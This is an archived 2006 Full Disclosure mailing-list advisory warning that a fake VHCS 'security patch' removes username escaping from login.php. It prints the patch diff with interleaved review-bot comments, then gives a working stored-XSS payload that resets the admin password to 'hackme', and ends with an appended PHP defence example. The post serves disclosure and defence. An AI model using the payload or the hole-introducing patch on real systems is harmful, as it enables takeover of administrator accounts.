Full Disclosure mailing list archives

VHCS Security Patch - 2006-02-05 --> Fake!
From: Roman Medina-Heigl Hernandez <roman () rs-labs com>
Date: Sun, 05 Feb 2006 21:09:11 +0100


Hi,

I've just visited VHCS main page and noticed the following "security patch":

http://vhcs.net/new/modules/news/article.php?storyid=23

It reads:

"This patch is for all VHCS versions.
You have to update only one GUI file - /vhcs2/gui/include/login.php

Just replace the file
"

Well, just do NOT apply it!!!! It's a fake! Indeed it will leave your
VHCS installation vulnerable to a high severity cross-site-scripting issue!

See it:
login_orig_unix.php --> original 2.4.7.1 login.php (converted to Unix)
login_new_unix.php  --> login.php from "security patch"

roman () rs-labs:~$ diff login_orig_unix.php login_new_unix.php
38c38
<               write_log("Login error, <b><i>".htmlspecialchars($uname,
ENT_QUOTES, "UTF-8")."</i></b> unknown username");
---
              write_log("Login error, <b><i>".$uname."</i></b> unknown
username");
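Review bot: the `>` side of 38c38 drops the htmlspecialchars($uname, ENT_QUOTES, "UTF-8") wrapper and writes the raw username into the log line; the surrounding `<b><i>…</i></b>` markup in the same write_log() call shows that line is later rendered as HTML, so removing the encoding reintroduces the stored cross-site scripting the original call prevented. Keep the original line. The identical removal repeats in 75c75, 104c104, 112c112, 190c190 and 199c199 and should be rejected in each.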
75c75
<
write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status
is not OK - user can not login");
---

write_log( $uname." Domain status is not OK - user can not login");
104c104
<                       write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user logged in.");
---
                      write_log( $uname." user logged in.");
112c112
<               write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad password login data.");
---
              write_log( $uname." bad password login data.");
190c190
<                       write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user session timed out");
---
                      write_log($uname." user session timed out");
199c199
<               write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad session data.");
---
              write_log($uname." bad session data.");
258a259
      die();
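Review bot: 258a259 inserts a bare `die();` with no surrounding context in the hunk, so it is impossible to see which code path it now terminates; a change that stops execution needs its neighbouring lines and a rationale before it can be reviewed, and it has no visible connection to the login-escaping fix the patch claims to be.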
261a263
}
437c439
< }
---
//}
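Review bot: 437c439 comments out a closing brace (`}` becomes `//}`), which together with the `}` inserted at 261a263 moves the end of some block hundreds of lines earlier; rebalancing braces silently changes which statements execute inside that block and is unrelated to a login security fix, so either drop both hunks or document exactly which block boundary is being moved and why.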
roman () rs-labs:~$


As you can see, the "patch" removes the htmlspecialchars() calls, leaving
login.php vulnerable. Nasty...

If you apply the "patch" (or have an old VHCS install, for instance
version <= 2.4.6.2), the XSS bug is active. Just for fun, you can
exploit it by entering the following as "username" (in the login entry
page):

</form><form name="dsr" method="post" action="ch%61nge_password.php"><input
name="pass" value="hackme"><input name="pass_rep" value="hackme"><input
name="uaction"
value="updt_pass"></form><script>document.dsr.submit()</script>

When the VHCS admin enters the "Admin Log" page (in the VHCS menu)... his
password will be set to "hackme" :-) The %61 trick is necessary to
bypass some string substitution. This exploit combines the XSS bug with
what I see as a poor security design bug, which is allowing a password
change without supplying the old one (Alex, please fix it in the next
release!).

Summarizing, my recommendation: use VHCS 2.4.7.1, and don't apply the patch.

-- 

Cheers,
-Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
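The two defences the post argues for, as an added PHP example that is neither VHCS code nor Roman's: keeping the htmlspecialchars() call on the logged username (the 2.4.7.1 behaviour the fake patch strips) and requiring the current password in the change-password handler. The in-memory log and admin record, the function names and the use of password_hash()/password_verify() are assumptions of this example.

```php
<?php
// Added example, not VHCS code: models (1) the htmlspecialchars() escaping that
// the fake "patch" strips from write_log() and (2) a change-password handler
// that insists on the current password. Storage and names are constructed.

// Constructed stand-ins for the VHCS log table and the admin record.
$LOG = [];
$ADMIN = ['uname' => 'admin', 'pass_hash' => password_hash('old-secret', PASSWORD_DEFAULT)];

// As in the 2.4.7.1 original: encode the attacker-controlled username before it
// is stored, because the Admin Log page later prints the line as HTML. The page
// that displays the log must then echo stored lines as-is, not encode twice.
function write_log(array &$log, string $uname, string $event): string {
    $safe = htmlspecialchars($uname, ENT_QUOTES, "UTF-8");
    $line = "Login error, <b><i>" . $safe . "</i></b> " . $event;
    $log[] = $line;
    return $line;
}

// Password change that requires the current password, which the post notes
// change_password.php did not; a forged form cannot supply it.
function change_password(array &$admin, string $old, string $new, string $rep): bool {
    if ($new === '' || $new !== $rep) {
        return false;
    }
    if (!password_verify($old, $admin['pass_hash'])) {
        return false;
    }
    $admin['pass_hash'] = password_hash($new, PASSWORD_DEFAULT);
    return true;
}

function check(bool $ok, string $what): void {
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Feed the post's payload in as the "username": it is stored inert.
$payload = '</form><form name="dsr" method="post" action="ch%61nge_password.php">'
         . '<input name="pass" value="hackme"></form><script>document.dsr.submit()</script>';
$line = write_log($LOG, $payload, "unknown username");
check(strpos($line, '<script>') === false, 'script tag neutralised');
check(strpos($line, '&lt;/form&gt;') !== false, 'tags are entity-encoded');

// The forged form carries no current password, so it cannot change anything.
check(change_password($ADMIN, '', 'hackme', 'hackme') === false, 'no old password');
check(change_password($ADMIN, 'old-secret', 'hackme', 'hackme') === true, 'legit change');
check(password_verify('hackme', $ADMIN['pass_hash']), 'new password stored');
echo "stored log line: $line\n";
```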

